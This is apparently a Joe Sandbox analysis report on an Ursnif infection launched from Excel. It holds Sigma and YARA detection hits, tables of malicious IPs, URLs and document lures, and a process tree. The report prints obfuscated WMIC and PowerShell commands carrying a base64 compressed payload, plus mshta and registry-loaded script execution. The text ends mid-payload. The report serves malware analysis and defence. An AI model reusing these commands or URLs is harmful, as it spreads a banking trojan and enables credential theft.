00000008.00000003.2517600435.02798000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 2248	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security

Unpacked PEs

No yara matches

Sigma Overview

System Summary:

Sigma detected: Ursnif

Show sources

Source: Registry Key set

Author: megan201296: Data: Details: E8 03 00 00 1C 80 00 00 B0 9F F5 C4 CD 23 3E 1B F5 D0 EF 82 67 88 24 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3392, TargetObject: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\DCB842AC-8BFE-6E42-F5D0-EF82F90493D6\Client

Sigma detected: wmic launch powershell and execute encrypted script

Show sources

Source: Process started

Author: Joe Security: Data: Command: wMic 'pRocess' Call 'creaTE' 'poWersHEll -wiN 01 -ExECUTi BypAsS -nOninTERa -nop '\'& ( `$PSHoME[21]+`$PSHOMe[30]+'X')(nEw-ObJECT Io.sTReamreader( ( nEw-ObJECT sYsTem.Io.comPrESSIOn.DeflAtesTREAm([Io.MeMoRYStreaM][CoNVERt]::froMbASe64STRInG( 'TVdZ06O4kv0rX3RMdFVdqj92bG7EPGCbfV/M1tExwWqz7wZTt/77iKp5mAeQSGVKJ1NJSufPj69fP79+eby+fPv4+scP9OcP5OcfH3/lH1+a2/ivL9+//OvLt2+fWqSyf+PfUfQ79s9fZSe2X758A2Z//MB+/p/JX/kXB2izCXhpmfdXd5F+z0j+/IH//HH6+YP6eWgThzawOQyYmbWdMYuAiQqelM3B27BY8K7BI3afSXcMfIJnmoquBYt+/D297ZlVPwv9U2Ub3XpPs8UyzT8ff1/19pWN8z///ndudU0c2SxF2LNVaI+vBxD8/PMHeYAA6xMABgmQYQARDhzAaYAJ9LFDB3xjYAwFMvyQAezEoXN4AmzJ377QvzxHf/tGgAYHLQlagv7lMQp0iMPkEIFpKGCKHcuD4WMVICIBCgxMArTIw+h3hFAgJcBcGDCkjlGgTZx/RQ49lgDz4Ef/CCMQo0CFOCwPs0NG/oowhf0KsXT1ZkVP+9hhH0PybquhWM5NWc0EVRpX3D61zFT13VKAEMPyqV0nqFuC44vC2BQ0ZsGI8CJhV9vy5XFLcVvU3yiE1dGwdHdRTHZ8sbDWvuo6iXJJPGusaPodIUTrGZjH89Swb7hJjfhKB1e+uDW93op1eHsEm6pV2Y7H5+Z1ys6hfyFJnyHmoAV2T+SZCqCdHTwirVbzHHUWW2qVBgGteoLGHhdqgyigcXZk0qZhdbgQ9XPejtwZy9y4G5SttooUhAeMxbmXdZBdYgW1RI

Sigma detected: MSHTA Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Invoke-Expression ([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:Software\AppDataLow\Software\Microsoft\DCB842AC-8BFE-6E42-F5D0-EF82F90493D6').crypmgmt)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Invoke-Expression ([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:Software\AppDataLow\Software\Microsoft\DCB842AC-8BFE-6E42-F5D0-EF82F90493D6').crypmgmt)), CommandLine|base64offset|contains: "{, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>moveTo(-898,-989);resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\DCB842AC-8BFE-6E42-F5D0-EF82F90493D6\\DtshsPub'));if(!wi

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis: Data: Command: wMic 'pRocess' Call 'creaTE' 'poWersHEll -wiN 01 -ExECUTi BypAsS -nOninTERa -nop '\'& ( `$PSHoME[21]+`$PSHOMe[30]+'X')(nEw-ObJECT Io.sTReamreader( ( nEw-ObJECT sYsTem.Io.comPrESSIOn.DeflAtesTREAm([Io.MeMoRYStreaM][CoNVERt]::froMbASe64STRInG( 'TVdZ06O4kv0rX3RMdFVdqj92bG7EPGCbfV/M1tExwWqz7wZTt/77iKp5mAeQSGVKJ1NJSufPj69fP79+eby+fPv4+scP9OcP5OcfH3/lH1+a2/ivL9+//OvLt2+fWqSyf+PfUfQ79s9fZSe2X758A2Z//MB+/p/JX/kXB2izCXhpmfdXd5F+z0j+/IH//HH6+YP6eWgThzawOQyYmbWdMYuAiQqelM3B27BY8K7BI3afSXcMfIJnmoquBYt+/D297ZlVPwv9U2Ub3XpPs8UyzT8ff1/19pWN8z///ndudU0c2SxF2LNVaI+vBxD8/PMHeYAA6xMABgmQYQARDhzAaYAJ9LFDB3xjYAwFMvyQAezEoXN4AmzJ377QvzxHf/tGgAYHLQlagv7lMQp0iMPkEIFpKGCKHcuD4WMVICIBCgxMArTIw+h3hFAgJcBcGDCkjlGgTZx/RQ49lgDz4Ef/CCMQo0CFOCwPs0NG/oowhf0KsXT1ZkVP+9hhH0PybquhWM5NWc0EVRpX3D61zFT13VKAEMPyqV0nqFuC44vC2BQ0ZsGI8CJhV9vy5XFLcVvU3yiE1dGwdHdRTHZ8sbDWvuo6iXJJPGusaPodIUTrGZjH89Swb7hJjfhKB1e+uDW93op1eHsEm6pV2Y7H5+Z1ys6hfyFJnyHmoAV2T+SZCqCdHTwirVbzHHUWW2qVBgGteoLGHhdqgyigcXZk0qZhdbgQ9XPejtwZy9y4G5SttooUhAeMxbmXdZBdYgW1RI

Sigma detected: Suspicious Csc.exe Source File Folder

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ygdsonvv.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ygdsonvv.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Invoke-Expression ([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:Software\AppDataLow\Software\Microsoft\DCB842AC-8BFE-6E42-F5D0-EF82F90493D6').crypmgmt)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3392, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\Herb Blackb

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
216.58.201.101	gzohsrwxahel.exe	Get hash	malicious	Browse
	0291108-892261.xls	Get hash	malicious	Browse
	0224014-429068.xls	Get hash	malicious	Browse
	2019-11-24_23-13-55.exe	Get hash	malicious	Browse
	0224014-429068.xls	Get hash	malicious	Browse
	Proof of payment2 (13).html	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
gmail.com	gzohsrwxahel.exe	Get hash	malicious	Browse	216.58.201.101
	0291108-892261.xls	Get hash	malicious	Browse	216.58.201.101
	0224014-429068.xls	Get hash	malicious	Browse	216.58.201.101
	2019-11-24_23-13-55.exe	Get hash	malicious	Browse	216.58.201.101
	0224014-429068.xls	Get hash	malicious	Browse	216.58.201.101
	syrish3.exe	Get hash	malicious	Browse	172.217.23.229
	info_10_24.doc	Get hash	malicious	Browse	172.217.22.197
	2.exe	Get hash	malicious	Browse	172.217.22.229

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
unknown	https://faltenlos.devmaschine.de/wp-content/uploads/2019/11/good/417802.zip	Get hash	malicious	Browse	78.47.106.25
	https://u.to/SBTlFg	Get hash	malicious	Browse	195.216.243.155
	http://allseasontrading.net/wp-admin/Pages	Get hash	malicious	Browse	66.96.160.130
	http://www.sambak.desa.id/stats/zplcm-prdw7z9rjaq5pr-gy7fgu-0rzccp2g/interni-spazio/3167791471-X2ZV37tVoyd5p/	Get hash	malicious	Browse	76.221.133.146
	http://www.sambak.desa.id/stats/zplcm-prdw7z9rjaq5pr-gy7fgu-0rzccp2g/interni-spazio/3167791471-X2ZV37tVoyd5p/	Get hash	malicious	Browse	76.221.133.146
	https://radhealth.hk/administrator/common_resource/corporate_warehouse/QPuSHVtd9iM_f35HmNdfiviNK/	Get hash	malicious	Browse	76.221.133.146
	iM3vdu9gFG.doc	Get hash	malicious	Browse	12.229.155.122
	https://urlsand.esvalabs.com/?u=https%3A%2F%2Fradhealth.hk%2Fadministrator%2Fcommon_resource%2Fcorporate_warehouse%2FQPuSHVtd9iM_f35HmNdfiviNK%2F&e=6127e441&h=e983bf88&f=n&p=y	Get hash	malicious	Browse	31.13.92.14
	http://ggdsd.psz.netsmartz.us/wp-content/uploads/2019/public/0w2nndo76v1/fz4pd-27581860-617093401-oyxum0-imeekr/	Get hash	malicious	Browse	208.91.114.104
	Payment.doc	Get hash	malicious	Browse	93.115.151.36
	http://www.terranovaoutdoorliving.com/config/private-disk/test-warehouse/mri9l96l5d850-3vz6/__;!!GaaboA!9PHosGWFU0JEObHbEBPW2HjyMJGYXqZ6SN_2tdI7OwTZYu-sv3-uyMjayI3NoOCbwWjKPx8$	Get hash	malicious	Browse	45.79.188.162
	http://www.terranovaoutdoorliving.com/config/private-disk/test-warehouse/mri9l96l5d850-3vz6/__;!!GaaboA!9PHosGWFU0JEObHbEBPW2HjyMJGYXqZ6SN_2tdI7OwTZYu-sv3-uyMjayI3NoOCbwWjKPx8$	Get hash	malicious	Browse	45.79.188.162
	https://nhfhew78we.blob.core.windows.net/hhf784yeje/Ab0vc.html	Get hash	malicious	Browse	52.239.153.36
	http://198.54.117.200/	Get hash	malicious	Browse	198.54.117.200
	http://recreate.bigfilmproduction.com/wp-includes/2x8vf9j1507/	Get hash	malicious	Browse	206.221.182.74
	http://tharbadir.com/11	Get hash	malicious	Browse	188.72.202.118
	http://careers.drhenderson.com.au/3qk8/protected_disk/special_ik3l4_069h/byed6l_19z4/	Get hash	malicious	Browse	125.7.57.137
	https://rebrand.ly/9u792c	Get hash	malicious	Browse	3.211.226.9
	http://tbagee.com/nsvvx/qLZo/	Get hash	malicious	Browse	167.71.63.214
	http://air-o-trip.com/wp-admin/kimCb/	Get hash	malicious	Browse	85.109.190.235
unknown	https://faltenlos.devmaschine.de/wp-content/uploads/2019/11/good/417802.zip	Get hash	malicious	Browse	78.47.106.25
	https://u.to/SBTlFg	Get hash	malicious	Browse	195.216.243.155
	http://allseasontrading.net/wp-admin/Pages	Get hash	malicious	Browse	66.96.160.130
	http://www.sambak.desa.id/stats/zplcm-prdw7z9rjaq5pr-gy7fgu-0rzccp2g/interni-spazio/3167791471-X2ZV37tVoyd5p/	Get hash	malicious	Browse	76.221.133.146
	http://www.sambak.desa.id/stats/zplcm-prdw7z9rjaq5pr-gy7fgu-0rzccp2g/interni-spazio/3167791471-X2ZV37tVoyd5p/	Get hash	malicious	Browse	76.221.133.146
	https://radhealth.hk/administrator/common_resource/corporate_warehouse/QPuSHVtd9iM_f35HmNdfiviNK/	Get hash	malicious	Browse	76.221.133.146
	iM3vdu9gFG.doc	Get hash	malicious	Browse	12.229.155.122
	https://urlsand.esvalabs.com/?u=https%3A%2F%2Fradhealth.hk%2Fadministrator%2Fcommon_resource%2Fcorporate_warehouse%2FQPuSHVtd9iM_f35HmNdfiviNK%2F&e=6127e441&h=e983bf88&f=n&p=y	Get hash	malicious	Browse	31.13.92.14
	http://ggdsd.psz.netsmartz.us/wp-content/uploads/2019/public/0w2nndo76v1/fz4pd-27581860-617093401-oyxum0-imeekr/	Get hash	malicious	Browse	208.91.114.104
	Payment.doc	Get hash	malicious	Browse	93.115.151.36
	http://www.terranovaoutdoorliving.com/config/private-disk/test-warehouse/mri9l96l5d850-3vz6/__;!!GaaboA!9PHosGWFU0JEObHbEBPW2HjyMJGYXqZ6SN_2tdI7OwTZYu-sv3-uyMjayI3NoOCbwWjKPx8$	Get hash	malicious	Browse	45.79.188.162
	http://www.terranovaoutdoorliving.com/config/private-disk/test-warehouse/mri9l96l5d850-3vz6/__;!!GaaboA!9PHosGWFU0JEObHbEBPW2HjyMJGYXqZ6SN_2tdI7OwTZYu-sv3-uyMjayI3NoOCbwWjKPx8$	Get hash	malicious	Browse	45.79.188.162
	https://nhfhew78we.blob.core.windows.net/hhf784yeje/Ab0vc.html	Get hash	malicious	Browse	52.239.153.36
	http://198.54.117.200/	Get hash	malicious	Browse	198.54.117.200
	http://recreate.bigfilmproduction.com/wp-includes/2x8vf9j1507/	Get hash	malicious	Browse	206.221.182.74
	http://tharbadir.com/11	Get hash	malicious	Browse	188.72.202.118
	http://careers.drhenderson.com.au/3qk8/protected_disk/special_ik3l4_069h/byed6l_19z4/	Get hash	malicious	Browse	125.7.57.137
	https://rebrand.ly/9u792c	Get hash	malicious	Browse	3.211.226.9
	http://tbagee.com/nsvvx/qLZo/	Get hash	malicious	Browse	167.71.63.214
	http://air-o-trip.com/wp-admin/kimCb/	Get hash	malicious	Browse	85.109.190.235

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	Payment Advice Note.doc	Get hash	malicious	Browse	94.100.28.184
	Invoice for Service.doc	Get hash	malicious	Browse	94.100.28.184
	275157_20191203.doc	Get hash	malicious	Browse	94.100.28.184
	275157_20191203.doc	Get hash	malicious	Browse	94.100.28.184
	DOC_RU1BWAYFKM_1129.doc	Get hash	malicious	Browse	94.100.28.184
	Dat 2019 12 02 DE85320452.doc	Get hash	malicious	Browse	94.100.28.184
	Copia Fattura.doc	Get hash	malicious	Browse	94.100.28.184
	2019M000052511.doc	Get hash	malicious	Browse	94.100.28.184
	Status update.doc	Get hash	malicious	Browse	94.100.28.184
	8GHWWCXMd2.doc	Get hash	malicious	Browse	94.100.28.184
	SCAN28665_00051.doc	Get hash	malicious	Browse	94.100.28.184
	#Uc190#Uc775+#Ubd84#Uc11d+#Ub0b4#Uc6a9_November_2019.doc	Get hash	malicious	Browse	94.100.28.184
	8811136.doc	Get hash	malicious	Browse	94.100.28.184
	8811136.doc	Get hash	malicious	Browse	94.100.28.184
	zero.msi	Get hash	malicious	Browse	94.100.28.184
	CV-2019 (12).docm	Get hash	malicious	Browse	94.100.28.184
	Doc_012646 invoice_Swift date_26_nov_2019.xls	Get hash	malicious	Browse	94.100.28.184
	copy-Inv. doc 20191126_80230.xls	Get hash	malicious	Browse	94.100.28.184
	copy-Inv. doc 20191126_80230.xls	Get hash	malicious	Browse	94.100.28.184
	copy-Inv. doc 20191126_91654.xls	Get hash	malicious	Browse	94.100.28.184
7dcce5b76c8b17472d024758970a406b	Payment Slip.xlsx	Get hash	malicious	Browse	216.58.201.101
	SecureDocument.docx	Get hash	malicious	Browse	216.58.201.101
	invoice_228487_nopw.doc	Get hash	malicious	Browse	216.58.201.101
	invoice_228487_nopw.doc	Get hash	malicious	Browse	216.58.201.101
	info_11_27.doc	Get hash	malicious	Browse	216.58.201.101
	PO#11900900.docm	Get hash	malicious	Browse	216.58.201.101
	0562E48212B93D70DB07B6286B7BFB1233581.docx	Get hash	malicious	Browse	216.58.201.101
	8811136.doc	Get hash	malicious	Browse	216.58.201.101
	8811136.doc	Get hash	malicious	Browse	216.58.201.101
	CV-2019 (12).docm	Get hash	malicious	Browse	216.58.201.101
	jucheck.exe	Get hash	malicious	Browse	216.58.201.101
	DOC-ID#SMGBSX2ABLIMBL.docx	Get hash	malicious	Browse	216.58.201.101
	0224014-429068.xls	Get hash	malicious	Browse	216.58.201.101
	PO#40910 - Quotation Request.docx	Get hash	malicious	Browse	216.58.201.101
	He1966809384.doc	Get hash	malicious	Browse	216.58.201.101
	PAYMENT COPY.xlsx	Get hash	malicious	Browse	216.58.201.101
	Thomas Hess - Harassment complaint letter (212-546-4000).doc	Get hash	malicious	Browse	216.58.201.101
	Thomas Hess - Harassment complaint letter (212-546-4000).doc	Get hash	malicious	Browse	216.58.201.101
	STAFF.docx	Get hash	malicious	Browse	216.58.201.101
	Service Manage Account.docx	Get hash	malicious	Browse	216.58.201.101

Dropped Files

No context

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Startup

System is w7

EXCEL.EXE (PID: 3776 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 716335EDBB91DA84FC102425BFDA957E)

WMIC.exe (PID: 3896 cmdline: wMic 'pRocess' Call 'creaTE' 'poWersHEll -wiN 01 -ExECUTi BypAsS -nOninTERa -nop '\'& ( `$PSHoME[21]+`$PSHOMe[30]+'X')(nEw-ObJECT Io.sTReamreader( ( nEw-ObJECT sYsTem.Io.comPrESSIOn.DeflAtesTREAm([Io.MeMoRYStreaM][CoNVERt]::froMbASe64STRInG( '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')'\'+ ([ChAr]44).TOStrINg()+ '\'[SYSTEm.IO.comPression.coMPRESsIoNMODe]::DecOMpreSs)) '\'+([ChAr]44).TOStrINg()+ '\'[SYsTEm.Text.ENcOdING]::AscII) ).rEAdToeNd( )'\'|.( $PShoMe[21]+$Pshome[30]+'X')' MD5: A03CF3838775E0801A0894C8BACD2E56)

powershell.exe (PID: 3940 cmdline: poWersHEll -wiN 01 -ExECUTi BypAsS -nOninTERa -nop '\'& ( `$PSHoME[21]+`$PSHOMe[30]+'X')(nEw-ObJECT Io.sTReamreader( ( nEw-ObJECT sYsTem.Io.comPrESSIOn.DeflAtesTREAm([Io.MeMoRYStreaM][CoNVERt]::froMbASe64STRInG( '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